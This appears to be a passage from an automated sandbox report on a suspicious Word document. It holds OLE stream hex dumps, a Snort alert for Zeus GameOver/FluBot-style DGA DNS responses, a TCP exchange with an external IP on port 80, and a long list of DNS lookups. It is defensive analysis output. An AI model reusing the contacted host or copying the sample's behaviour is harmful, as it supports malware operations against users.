                        Data ASCII:. . . . l . . . . . . . . . . . # . . . / . . . . . . . . . . . ! . . . . . . E M F . . . . d . . . . . . . . . . . . . . . . . . . . . . . V . . . . . . i . . . . . . . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . 5 . . . R . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . e . g . o . e . . U . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . . . [ o . . . . ( ? .
                        Data Raw:01 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 23 00 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 21 04 00 00 91 05 00 00 20 45 4d 46 00 00 01 00 64 13 00 00 0d 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 05 00 00 97 02 00 00 69 01 00 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 83 05 00 3a ad 02 00 0a 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00
                        Stream Path: ObjectPool/_1683339676/\x3ObjInfo, File Type: data, Stream Size: 6
                        General
                        Stream Path:ObjectPool/_1683339676/\x3ObjInfo
                        File Type:data
                        Stream Size:6
                        Entropy:1.2516291673878228
                        Base64 Encoded:False
                        Data ASCII:. . . . . .
                        Data Raw:00 00 03 00 0d 00
                        Stream Path: WordDocument, File Type: data, Stream Size: 4096
                        General
                        Stream Path:WordDocument
                        File Type:data
                        Stream Size:4096
                        Entropy:1.3806636157466747
                        Base64 Encoded:False
                        Data ASCII:. Y . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j 8 . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . Z p e Z p e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . .
                        Data Raw:ec a5 c1 00 59 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 18 08 00 00 0e 00 62 6a 62 6a 38 1a 38 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 5a 70 d2 65 5a 70 d2 65 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        1.1.1.1192.168.2.253575362018316 04/26/23-12:39:11.196625UDP2018316ET TROJAN Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses53575361.1.1.1192.168.2.2

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Apr 26, 2023 12:39:08.966274023 CEST4975980192.168.2.264.185.227.155
                        Apr 26, 2023 12:39:09.114624023 CEST804975964.185.227.155192.168.2.2
                        Apr 26, 2023 12:39:09.114835978 CEST4975980192.168.2.264.185.227.155
                        Apr 26, 2023 12:39:09.115633011 CEST4975980192.168.2.264.185.227.155
                        Apr 26, 2023 12:39:09.263818979 CEST804975964.185.227.155192.168.2.2
                        Apr 26, 2023 12:39:09.263889074 CEST804975964.185.227.155192.168.2.2
                        Apr 26, 2023 12:39:09.264091969 CEST4975980192.168.2.264.185.227.155
                        Apr 26, 2023 12:40:09.331617117 CEST804975964.185.227.155192.168.2.2
                        Apr 26, 2023 12:40:09.331764936 CEST4975980192.168.2.264.185.227.155
                        Apr 26, 2023 12:40:58.896186113 CEST4975980192.168.2.264.185.227.155
                        Apr 26, 2023 12:40:59.044538021 CEST804975964.185.227.155192.168.2.2

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Apr 26, 2023 12:39:08.935026884 CEST5092853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:08.952821970 CEST53509281.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:09.296077013 CEST5462453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:09.439115047 CEST53546241.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:09.472568989 CEST6495253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:09.531148911 CEST53649521.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:09.543818951 CEST5869953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:09.718512058 CEST53586991.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:10.132684946 CEST5160653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:10.277857065 CEST53516061.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:10.284674883 CEST5567453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:10.375053883 CEST53556741.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:10.383202076 CEST4987753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:10.401182890 CEST53498771.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:10.667573929 CEST5052453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:10.685574055 CEST53505241.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:10.690932989 CEST5471753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:10.757534981 CEST53547171.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:10.762991905 CEST5120453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:10.813791037 CEST53512041.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:11.072596073 CEST6243853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:11.110009909 CEST53624381.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:11.114505053 CEST5153453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:11.132643938 CEST53515341.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:11.138317108 CEST5753653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:11.196624994 CEST53575361.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:11.450864077 CEST5392353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:11.591929913 CEST53539231.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:11.596265078 CEST6176653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:11.650285006 CEST53617661.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:11.656239033 CEST5518253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:11.740138054 CEST53551821.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:11.982109070 CEST5827653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:12.000230074 CEST53582761.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:12.004816055 CEST5927253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:12.064194918 CEST53592721.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:12.072732925 CEST5324453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:12.126926899 CEST53532441.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:12.403132915 CEST5763553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:12.548561096 CEST53576351.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:12.556523085 CEST5223653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:12.617754936 CEST53522361.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:12.626043081 CEST6273553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:12.643748045 CEST53627351.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:12.901788950 CEST5306253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:13.077503920 CEST53530621.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:13.088520050 CEST6132753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:13.187711000 CEST53613271.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:13.198224068 CEST5921553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:13.295034885 CEST53592151.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:13.540209055 CEST6537353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:13.676645041 CEST53653731.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:13.686687946 CEST5945653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:13.774089098 CEST53594561.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:13.781276941 CEST5950453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:13.873217106 CEST53595041.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:14.130670071 CEST5377953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:14.242264986 CEST53537791.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:14.254179001 CEST5533153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:14.272593975 CEST53553311.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:14.276876926 CEST5134453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:14.295007944 CEST53513441.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:14.592998028 CEST5409553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:14.741055012 CEST53540951.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:14.753493071 CEST5211353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:14.811810970 CEST53521131.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:14.817755938 CEST6271053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:14.835741043 CEST53627101.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:15.117048025 CEST6336353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:15.150242090 CEST53633631.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:15.156553984 CEST6425453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:15.248249054 CEST53642541.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:15.256905079 CEST6543653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:15.318742990 CEST53654361.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:15.658421040 CEST5185653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:15.837482929 CEST53518561.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:15.850430012 CEST6378153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:15.983050108 CEST53637811.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:15.987623930 CEST5310953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:16.042918921 CEST53531091.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:16.316071987 CEST6187753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:16.459687948 CEST53618771.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:16.467619896 CEST5494953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:16.756397009 CEST53549491.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:16.761519909 CEST4941653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:16.820895910 CEST53494161.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:17.093410015 CEST6353553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:17.127188921 CEST53635351.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:17.169755936 CEST6239853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:17.224607944 CEST53623981.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:17.243094921 CEST6276753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:17.293441057 CEST53627671.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:17.625693083 CEST5087953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:17.773747921 CEST53508791.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:17.779736042 CEST6361653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:17.797873020 CEST53636161.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:17.815921068 CEST5998653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:17.906128883 CEST53599861.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:18.165196896 CEST6429553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:18.308417082 CEST53642951.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:18.349658966 CEST6155753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:18.368042946 CEST53615571.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:18.417273045 CEST5266953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:18.510242939 CEST53526691.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:18.827224016 CEST6545853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:18.968424082 CEST53654581.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:19.010282993 CEST5222053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:19.107664108 CEST53522201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:19.113235950 CEST4998353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:19.197249889 CEST53499831.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:19.466682911 CEST6375053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:19.485215902 CEST53637501.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:19.491158962 CEST4981353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:19.549403906 CEST53498131.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:19.558310986 CEST5573153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:19.651731968 CEST53557311.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:19.946369886 CEST5328153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:20.123270035 CEST53532811.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:20.132038116 CEST5363153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:20.194327116 CEST53536311.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:20.239778996 CEST6264653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:20.298561096 CEST53626461.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:20.619488955 CEST6294253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:20.637701988 CEST53629421.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:20.644637108 CEST6484853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:20.728665113 CEST53648481.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:20.734090090 CEST5094753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:20.752176046 CEST53509471.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:21.073558092 CEST5547153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:21.092003107 CEST53554711.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:21.096513987 CEST6262053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:21.166327000 CEST53626201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:21.176198006 CEST5898853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:21.194466114 CEST53589881.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:21.462631941 CEST5805953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:21.480921984 CEST53580591.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:21.488512039 CEST6288453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:21.560868025 CEST53628841.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:21.571495056 CEST5958853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:21.635113001 CEST53595881.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:21.932694912 CEST5602753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:21.950751066 CEST53560271.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:21.955167055 CEST6159253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:21.973259926 CEST53615921.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:21.979007959 CEST5850253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:21.997107983 CEST53585021.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:22.286385059 CEST5852853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:22.396251917 CEST53585281.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:22.401173115 CEST6538853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:22.419420004 CEST53653881.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:22.448515892 CEST5154153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:22.466968060 CEST53515411.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:22.764460087 CEST5248253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:22.782723904 CEST53524821.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:22.789333105 CEST4915853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:22.808361053 CEST53491581.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:22.813225985 CEST6280053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:22.831535101 CEST53628001.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:23.124068022 CEST6125253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:23.141941071 CEST53612521.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:23.148073912 CEST6061453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:23.230834961 CEST53606141.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:23.242269993 CEST5717353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:23.339159012 CEST53571731.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:23.611525059 CEST5715053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:23.745532990 CEST53571501.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:23.754708052 CEST5095653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:23.772680998 CEST53509561.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:23.781591892 CEST5805753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:23.836850882 CEST53580571.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:24.128801107 CEST5707653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:24.147521973 CEST53570761.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:24.158813953 CEST6375853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:24.177067995 CEST53637581.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:24.183815956 CEST6339853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:24.201776028 CEST53633981.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:24.506140947 CEST6392053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:24.524089098 CEST53639201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:24.542625904 CEST5079253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:24.560566902 CEST53507921.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:24.571949005 CEST5213853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:24.589497089 CEST53521381.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:24.869878054 CEST6056253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:24.979191065 CEST53605621.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:24.984281063 CEST5172053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:25.002233982 CEST53517201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:25.028326035 CEST6041053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:25.084835052 CEST53604101.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:25.354466915 CEST5981553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:25.462429047 CEST53598151.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:25.467735052 CEST5830353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:25.485658884 CEST53583031.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:25.495034933 CEST4984853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:25.513008118 CEST53498481.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:25.802589893 CEST6448153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:25.820940971 CEST53644811.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:25.826447964 CEST5695253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:25.880855083 CEST53569521.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:25.890778065 CEST5562753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:25.908900023 CEST53556271.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:26.182188988 CEST6076953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:26.200602055 CEST53607691.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:26.208180904 CEST5023253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:26.226273060 CEST53502321.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:26.230973959 CEST5132653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:26.249034882 CEST53513261.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:26.514023066 CEST5694653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:26.532125950 CEST53569461.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:26.536528111 CEST5273853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:26.698299885 CEST53527381.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:26.702773094 CEST5057953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:26.757344961 CEST53505791.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:27.002733946 CEST5102953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:27.020817995 CEST53510291.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:27.027327061 CEST5073453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:27.045418978 CEST53507341.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:27.055802107 CEST6406453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:27.155508041 CEST53640641.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:27.408823967 CEST5693553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:27.427287102 CEST53569351.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:27.431654930 CEST5297553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:27.449704885 CEST53529751.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:27.459875107 CEST5196653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:27.478487968 CEST53519661.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:27.750652075 CEST5973753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:27.769177914 CEST53597371.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:27.775496006 CEST5216153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:27.793623924 CEST53521611.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:27.800120115 CEST5938453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:27.818552017 CEST53593841.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:28.072055101 CEST6056453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:28.090600014 CEST53605641.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:28.095869064 CEST6101453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:28.113765955 CEST53610141.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:28.127341986 CEST5950553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:28.145761013 CEST53595051.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:28.431988001 CEST5883553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:28.450054884 CEST53588351.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:28.454859972 CEST5776853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:28.473021984 CEST53577681.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:28.477427006 CEST5643053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:28.495929003 CEST53564301.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:28.761188984 CEST5559153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:28.779299021 CEST53555911.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:28.792526960 CEST5926353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:28.856926918 CEST53592631.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:28.865966082 CEST6108453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:28.884175062 CEST53610841.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:29.164788961 CEST5209753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:29.183032036 CEST53520971.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:29.187830925 CEST5500353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:29.205861092 CEST53550031.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:29.220557928 CEST6191753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:29.238306046 CEST53619171.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:29.526858091 CEST6291153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:29.670698881 CEST53629111.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:29.680283070 CEST6363453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:29.698582888 CEST53636341.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:29.705677986 CEST5826953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:29.787506104 CEST53582691.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:30.046569109 CEST5178953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:30.153454065 CEST53517891.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:30.161818027 CEST6082053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:30.179555893 CEST53608201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:30.185216904 CEST5173653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:30.243339062 CEST53517361.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:30.514914036 CEST6487053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:30.533230066 CEST53648701.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:30.537553072 CEST4919153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:30.555413008 CEST53491911.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:30.565566063 CEST5505253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:30.583460093 CEST53550521.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:30.852807999 CEST6460153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:30.996170998 CEST53646011.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:31.035161018 CEST5349253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:31.052639008 CEST53534921.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:31.058480024 CEST6233853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:31.076694012 CEST53623381.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:31.339174032 CEST5101053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:31.357254982 CEST53510101.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:31.362051010 CEST6354853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:31.380008936 CEST53635481.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:31.384969950 CEST5225853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:31.403415918 CEST53522581.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:31.686476946 CEST5302253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:31.704477072 CEST53530221.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:31.710948944 CEST5806253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:31.729060888 CEST53580621.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:31.733556986 CEST5815753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:31.788790941 CEST53581571.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:32.163151979 CEST6012953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:32.180881023 CEST53601291.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:32.185923100 CEST5314753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:32.203648090 CEST53531471.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:32.208529949 CEST5390853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:32.226588964 CEST53539081.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:33.027686119 CEST5822853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:33.045593977 CEST53582281.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:33.057111025 CEST5864253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:33.076236963 CEST53586421.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:33.082050085 CEST4947753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:33.100610971 CEST53494771.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:33.510412931 CEST4980753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:33.529033899 CEST53498071.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:33.533642054 CEST6156553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:33.551836967 CEST53615651.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:33.564184904 CEST4987153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:33.582119942 CEST53498711.1.1.1192.168.2.2
